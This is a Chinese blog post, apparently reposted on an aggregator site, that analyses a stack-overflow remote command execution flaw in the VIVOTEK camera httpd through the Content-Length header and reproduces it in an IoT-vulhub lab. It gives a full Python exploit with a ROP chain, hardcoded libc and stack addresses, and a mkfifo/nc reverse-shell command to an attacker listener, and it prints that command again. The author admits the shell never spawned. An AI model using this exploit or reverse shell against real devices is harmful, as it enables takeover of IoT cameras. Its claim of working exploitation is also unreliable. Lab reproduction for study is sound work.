2. 程式人生 > 其它 >漏洞分析:VIVOTEK棧溢位遠端命令執行漏洞

漏洞分析:VIVOTEK棧溢位遠端命令執行漏洞

阿新 發佈:2021-11-27

漏洞分析:VIVOTEK棧溢位遠端命令執行漏洞

  這是/usr/sbin/httpd中,存在的對POST請求中Content-Length欄位處理不當導致的棧溢位,攻擊者通過構造惡意資料包實現RCE,下面對這個漏洞進行復現和分析,環境使用IoT-vulhub中提供的環境。

漏洞分析

  由於韌體剝離了符號表,無法恢復出函式名和一些結構體,我翻了一下韌體裡面好像也沒有包含符號表,這對於逆向的難度比較大。我覺得在逆向httpd的過程中,要想離漏洞更近一步,就需要快速地理清楚http請求是在哪裡被處理的,然後再看處理http請求的過程中,在對字串進行處理的時候,使用了哪些危險函式,使用的這些危險函式有沒有可能造成棧溢位和命令注入這種漏洞。

  sub_19D7C函式中,有一個switch-case的分支語句,裡面包含對各種http請求的處理:

  第一個函式中,就是漏洞點存在的位置:當請求方式是POST請求或者PUT請求的時候,就會向棧中拷貝Content-Length欄位的值,拷貝的方式很原始,直接用strncpy複製,第三個引數的值由字串首尾指標相減得到,沒有對Content-Length的長度做出限制,就可能造成棧溢位。

漏洞利用

  關於漏洞利用,路由器攝像頭這些和普通的pwn題肯定不一樣,pwn題輸入輸出繫結在埠上,system("/bin/sh")構造一條ROP鏈可以很簡單,但是對於這些IoT裝置肯定要起一個反彈shell。構思一下,大概需要這麼幾個步驟:

  1.輸入的時候,輸入的值是拷貝到棧上的,這時候我們輸入的是反彈shell的命令;

  2.我們需要把這個命令傳遞給system函式,那我們就需要先把sp指標移動到反彈shell被拷貝在棧上的位置;

  3.然後再找到類似"mov r0,sp"這樣的gadget。

  在除錯的過程中,發現在httpd崩潰之後,sp暫存器指向的地址,在拷貝的目的地址+0x38地址處,就是說如果把反彈shell的命令佈置在這個地址處,就可以不用找gadget去移動sp指標,只要再找到一條rop鏈,最終滿足"mov r0,sp"這種就可以了。

  這個漏洞的利用中,還要考慮的一點就是規避"\x00"字元,如果構造的資料包中存在"\x00",strncpy在拷貝的過程中一定會被截斷,導致利用的失敗。如果遠端環境開啟了aslr,我們就只能利用httpd的自身的gadget先來洩露地址,而這時候gadget中不可避免地會出現"\x00",所以為了完成利用,可能確實得先關閉一下aslr,關閉aslr之後,system函式,棧地址這些在記憶體中的載入地址都是固定的,構造思路更簡單了。

  除錯得到libc載入的基地址:

  我們寫入的payload構造大致如下圖:

  最終exp如下:

import os

#ttpd_path = "/root/squashfs-root/usr/sbin/httpd"
#lib_path = "/root/squashfs-root/lib/libc.so.0"
#elf = ELF(httpd_path)
#libc = ELF(lib_path)

libc_base = 0xb6f2d000
stack = 0xbeffeb08
# 0x00033100 : pop {r0, pc}
pop_r0_pc = 0x000485d4 + libc_base
system_addr = 0xb6f74ab0
#reverse_shell = "nc -e /bin/bash 192.168.2.1 3456\n"
reverse_shell = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.1 3456 > /tmp/f"
ropchain = 'a'*52 + p32(pop_r0_pc) + p32(stack) + p32(system_addr) + reverse_shell

payload = "POST /cgi-bin/admin/upgrade.cgi\r\nHTTP/1.0\nContent-Length:%s\n\r\n\r\n"%ropchain
cmd = b'''echo -en  "%s" |  nc -v 192.168.2.2 80'''%payload
log.success("%s"%(payload))
#os.system(cmd)
with open('./pd','rb+') as f:
    f.write(cmd)
#p.interactive()

  預設linux的nc沒有帶-e(傳送至性程式)選項, 選擇通過命名管道的方式把bash通過nc反彈出來:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.1 3456 > /tmp/f

  寫入到pd這個檔案之後,chmod加上可執行許可權,同時在另一個視窗用nc偵聽3456埠,執行pd:

  可以看到攻擊機和靶機在執行payload之後,建立了連線,但是不知道為啥sh沒有被彈出來......unbengable

  

  

相關推薦

漏洞分析VIVOTEK溢位遠端命令執行漏洞

漏洞分析:VIVOTEK棧溢位遠端命令執行漏洞   這是/usr/sbin/httpd中,存在的對POST請求中Content-Length欄位處理不當導致的棧溢位,攻擊者通過構造惡意資料包實現RCE,下面對這個漏洞進行復現和分析,環境使用IoT

Maccms8.x 遠端命令執行漏洞分析

前言 復現原始碼地址:https://github.com/yaofeifly/Maccms8.x 除錯中xdebug突然自動停止,新增下httpd.conf中的FcgidIOTimeout

國家網路安全通報中心Windows 作業系統 HTTP 協議存在遠端程式碼執行漏洞

5 月 13 日訊息 昨日晚間,國家網路安全通報中心釋出了《關於 Windows 作業系統 HTTP 協議存在遠端程式碼執行漏洞的預警通報》(以下簡稱“通報”)。

IOT入門---------第一個cve復現(CVE-2020-24581 D-Link DSL-2888A 遠端命令執行漏洞分析)

漏洞描述 D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本存在安全漏洞,該漏洞源於包含一個execute cmd.cgi特性(不能通過web使用者介面訪問),該特性允許經過身份驗證的使用者執行作業系統命令。在該版本韌體中同時

D-Link 路由器資訊洩露和遠端命令執行漏洞分析及全球資料分析報告

作者知道創宇404實驗室 報告發布日期2017年08月11日 PDF 版報告下載D-Link 路由器資訊洩露和遠端命令執行漏洞分析及全球資料分析報告

Redis遠端命令執行漏洞復現

本文首發於我的個人部落格,記錄了我在實驗室學習滲透測試所做的第二個漏洞復現,全部過程記錄在此,以便後續檢視,同時也希望本文能對您有所幫助。

fastjson遠端命令執行漏洞復現

fastjson遠端命令執行漏洞復現 使用vulhub提供的docker環境https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce

漏洞復現系列】ThinkPHP 5 遠端命令執行

使用vulhub搭建環境 https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce 啟動docker容器

Weblogic未授權遠端命令執行漏洞(CVE-2020-14882&CVE-2020-14883)復現

Weblogic是Oracle公司推出的J2EE應用伺服器,CVE-2020-14882允許未授權的使用者繞過管理控制檯的許可權驗證訪問後臺,CVE-2020-14883允許後臺任意使用者通過HTTP協議執行任意命令。使用這兩個漏洞組成的利用鏈,可通

Weblogic遠端命令執行漏洞復現(CVE-2020-14645)

影響版本 Oracle WebLogic Server 10.3.6.0.0 Oracle WebLogic Server 12.1.3.0.0 Oracle WebLogic Server 12.2.1.3.0

CVE-2018-1273 Spring Data Commons 遠端命令執行漏洞復現

一、漏洞描述 Spring Data是一個用於簡化資料庫訪問,並支援雲服務的開源框架,Spring Data Commons是Spring Data下所有子專案共享的基礎框架。Spring Data Commons 在2.0.5及以前版本中,存在一處SpEL表示式注入漏洞

Apache SSI 遠端命令執行漏洞

一.漏洞介紹 SSI 注入全稱Server-Side Includes Injection,即服務端包含注入。 SSI是嵌入HTML頁面中的指令,在頁面被提供時由伺服器進行運算,以對現有HTML頁面增加動態生成的內容,而無須通過CGI程式提供其整個

Apache Solr 遠端命令執行漏洞復現(CVE-2019-0193)

一.漏洞介紹 Apache Solr 是一個開源的搜尋伺服器。Solr 使用 Java 語言開發,主要基於 HTTP 和 Apache Lucene 實現。此次漏洞出現在Apache Solr的DataImportHandler,該模組是一個可選但常用的模組,用於從資料庫

Spring Security OAuth2 遠端命令執行漏洞

Spring Security OAuth2 遠端命令執行漏洞 Spring Security OAuth2 遠端命令執行漏洞 (CVE-2016-4977)

Samba遠端命令執行漏洞復現

Linux版永恆之藍 0x00 漏洞概述 編號CVE-2017-7494。 Samba允許連線一個遠端的命名管道,在連線前會呼叫is_known_pipename()函式驗證管道名稱是否合法。

億賽通 電子文件安全管理系統遠端命令執行漏洞 CNVD-2021-26058

FOFA語句title=\"電子文件安全管理系統\" exp附上 1 import re 2 importrequests 3 requests.packages.urllib3.disable_warnings()

Struts2 S2-061 遠端命令執行漏洞(CVE-2020-17530)復現

Struts2 S2-061 遠端命令執行漏洞(CVE-2020-17530)復現 0x00 漏洞介紹 Struts2框架是一個用於開發Java EE網路應用程式的開放原始碼網頁應用程式架構。它利用並延伸了Java Servlet API,鼓勵開發者採用MVC架構。Stru

CVE-2020-10977-GITLAB CE/EE 任意檔案讀取導致遠端命令執行漏洞-環境搭建及完整復現圖文詳細筆記

漏洞環境搭建-CENTOS7 1.安裝依賴軟體 yum -y install policycoreutils openssh-server openssh-clients postfix

MS-08-067 windows smb服務 遠端命令執行漏洞

漏洞概要 MS-08-067是Windows平臺中smb服務445埠的遠端程式碼執行漏洞 利用成功可以遠端控制主機

Spring Framework 遠端命令執行漏洞(CVE-2022-22965)

Spring Framework 遠端命令執行漏洞 (CVE-2022-22965)  近日,Spring 官方 GitHub issue中提到了關於 Spring Core 的遠端命令執行漏洞,該漏洞廣泛存在於Spring 框架以及衍生的框架中。